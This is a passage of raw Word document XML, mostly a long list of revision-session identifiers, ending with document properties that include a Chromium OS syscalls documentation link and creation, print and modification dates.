    <w:rsid w:val="00F874DF"/>
    <w:rsid w:val="00F878B0"/>
    <w:rsid w:val="00F878B8"/>
    <w:rsid w:val="00F900DD"/>
    <w:rsid w:val="00F90C5E"/>
    <w:rsid w:val="00F90EDB"/>
    <w:rsid w:val="00F91092"/>
    <w:rsid w:val="00F910DE"/>
    <w:rsid w:val="00F91534"/>
    <w:rsid w:val="00F91A77"/>
    <w:rsid w:val="00F91C0F"/>
    <w:rsid w:val="00F91E30"/>
    <w:rsid w:val="00F91F38"/>
    <w:rsid w:val="00F9203E"/>
    <w:rsid w:val="00F92259"/>
    <w:rsid w:val="00F923B4"/>
    <w:rsid w:val="00F9276C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52"/>
    <w:rsid w:val="00F957DC"/>
    <w:rsid w:val="00F95E8A"/>
    <w:rsid w:val="00F96553"/>
    <w:rsid w:val="00F96EF7"/>
    <w:rsid w:val="00FA0686"/>
    <w:rsid w:val="00FA088D"/>
    <w:rsid w:val="00FA0EED"/>
    <w:rsid w:val="00FA1138"/>
    <w:rsid w:val="00FA17EF"/>
    <w:rsid w:val="00FA186A"/>
    <w:rsid w:val="00FA275B"/>
    <w:rsid w:val="00FA298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17B"/>
    <w:rsid w:val="00FA6C62"/>
    <w:rsid w:val="00FA6D8A"/>
    <w:rsid w:val="00FA7776"/>
    <w:rsid w:val="00FA782B"/>
    <w:rsid w:val="00FA7D6C"/>
    <w:rsid w:val="00FB110D"/>
    <w:rsid w:val="00FB12FA"/>
    <w:rsid w:val="00FB1A89"/>
    <w:rsid w:val="00FB20AB"/>
    <w:rsid w:val="00FB3468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075A"/>
    <w:rsid w:val="00FC177D"/>
    <w:rsid w:val="00FC195B"/>
    <w:rsid w:val="00FC1ACF"/>
    <w:rsid w:val="00FC22BA"/>
    <w:rsid w:val="00FC23AF"/>
    <w:rsid w:val="00FC2836"/>
    <w:rsid w:val="00FC2AD2"/>
    <w:rsid w:val="00FC352E"/>
    <w:rsid w:val="00FC3EA9"/>
    <w:rsid w:val="00FC4083"/>
    <w:rsid w:val="00FC45F4"/>
    <w:rsid w:val="00FC47EF"/>
    <w:rsid w:val="00FC4907"/>
    <w:rsid w:val="00FC5213"/>
    <w:rsid w:val="00FC52E0"/>
    <w:rsid w:val="00FC5B84"/>
    <w:rsid w:val="00FC63D7"/>
    <w:rsid w:val="00FC6FCB"/>
    <w:rsid w:val="00FC71E6"/>
    <w:rsid w:val="00FC752E"/>
    <w:rsid w:val="00FC790F"/>
    <w:rsid w:val="00FC7C05"/>
    <w:rsid w:val="00FD0240"/>
    <w:rsid w:val="00FD0567"/>
    <w:rsid w:val="00FD05CF"/>
    <w:rsid w:val="00FD0B27"/>
    <w:rsid w:val="00FD0E02"/>
    <w:rsid w:val="00FD1227"/>
    <w:rsid w:val="00FD12F1"/>
    <w:rsid w:val="00FD1515"/>
    <w:rsid w:val="00FD17DF"/>
    <w:rsid w:val="00FD1F74"/>
    <w:rsid w:val="00FD34B0"/>
    <w:rsid w:val="00FD34B6"/>
    <w:rsid w:val="00FD3810"/>
    <w:rsid w:val="00FD3D89"/>
    <w:rsid w:val="00FD41B0"/>
    <w:rsid w:val="00FD48EF"/>
    <w:rsid w:val="00FD49BE"/>
    <w:rsid w:val="00FD49E7"/>
    <w:rsid w:val="00FD4C51"/>
    <w:rsid w:val="00FD4F1C"/>
    <w:rsid w:val="00FD55C0"/>
    <w:rsid w:val="00FD5C0B"/>
    <w:rsid w:val="00FD6950"/>
    <w:rsid w:val="00FD6F99"/>
    <w:rsid w:val="00FD7221"/>
    <w:rsid w:val="00FD75CB"/>
    <w:rsid w:val="00FD78F9"/>
    <w:rsid w:val="00FD7BB5"/>
    <w:rsid w:val="00FD7C7D"/>
    <w:rsid w:val="00FE062A"/>
    <w:rsid w:val="00FE06CF"/>
    <w:rsid w:val="00FE073D"/>
    <w:rsid w:val="00FE0C24"/>
    <w:rsid w:val="00FE13C3"/>
    <w:rsid w:val="00FE299C"/>
    <w:rsid w:val="00FE30C8"/>
    <w:rsid w:val="00FE3341"/>
    <w:rsid w:val="00FE383B"/>
    <w:rsid w:val="00FE40E1"/>
    <w:rsid w:val="00FE41BD"/>
    <w:rsid w:val="00FE4374"/>
    <w:rsid w:val="00FE4905"/>
    <w:rsid w:val="00FE5157"/>
    <w:rsid w:val="00FE5C94"/>
    <w:rsid w:val="00FE5CAF"/>
    <w:rsid w:val="00FE5E4D"/>
    <w:rsid w:val="00FE6AB0"/>
    <w:rsid w:val="00FE7AB5"/>
    <w:rsid w:val="00FE7CA8"/>
    <w:rsid w:val="00FE7CAA"/>
    <w:rsid w:val="00FF028E"/>
    <w:rsid w:val="00FF060E"/>
    <w:rsid w:val="00FF19A6"/>
    <w:rsid w:val="00FF1CE0"/>
    <w:rsid w:val="00FF1D23"/>
    <w:rsid w:val="00FF21B0"/>
    <w:rsid w:val="00FF2650"/>
    <w:rsid w:val="00FF2C4E"/>
    <w:rsid w:val="00FF2F11"/>
    <w:rsid w:val="00FF3006"/>
    <w:rsid w:val="00FF475F"/>
    <w:rsid w:val="00FF4F7A"/>
    <w:rsid w:val="00FF50A7"/>
    <w:rsid w:val="00FF5421"/>
    <w:rsid w:val="00FF5888"/>
    <w:rsid w:val="00FF6601"/>
    <w:rsid w:val="00FF6C2C"/>
    <w:rsid w:val="00FF70CE"/>
    <w:rsid w:val="00FF733F"/>
    <w:rsid w:val="00FF7354"/>
    <w:rsid w:val="00FF74BB"/>
    <w:rsid w:val="00FF7632"/>
    <w:rsid w:val="00FF776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ium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.m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hromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.m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8</TotalTime>
  <Pages>1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5935</cp:revision>
  <cp:lastPrinted>2022-02-19T00:46:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-31T16:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-28T20:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>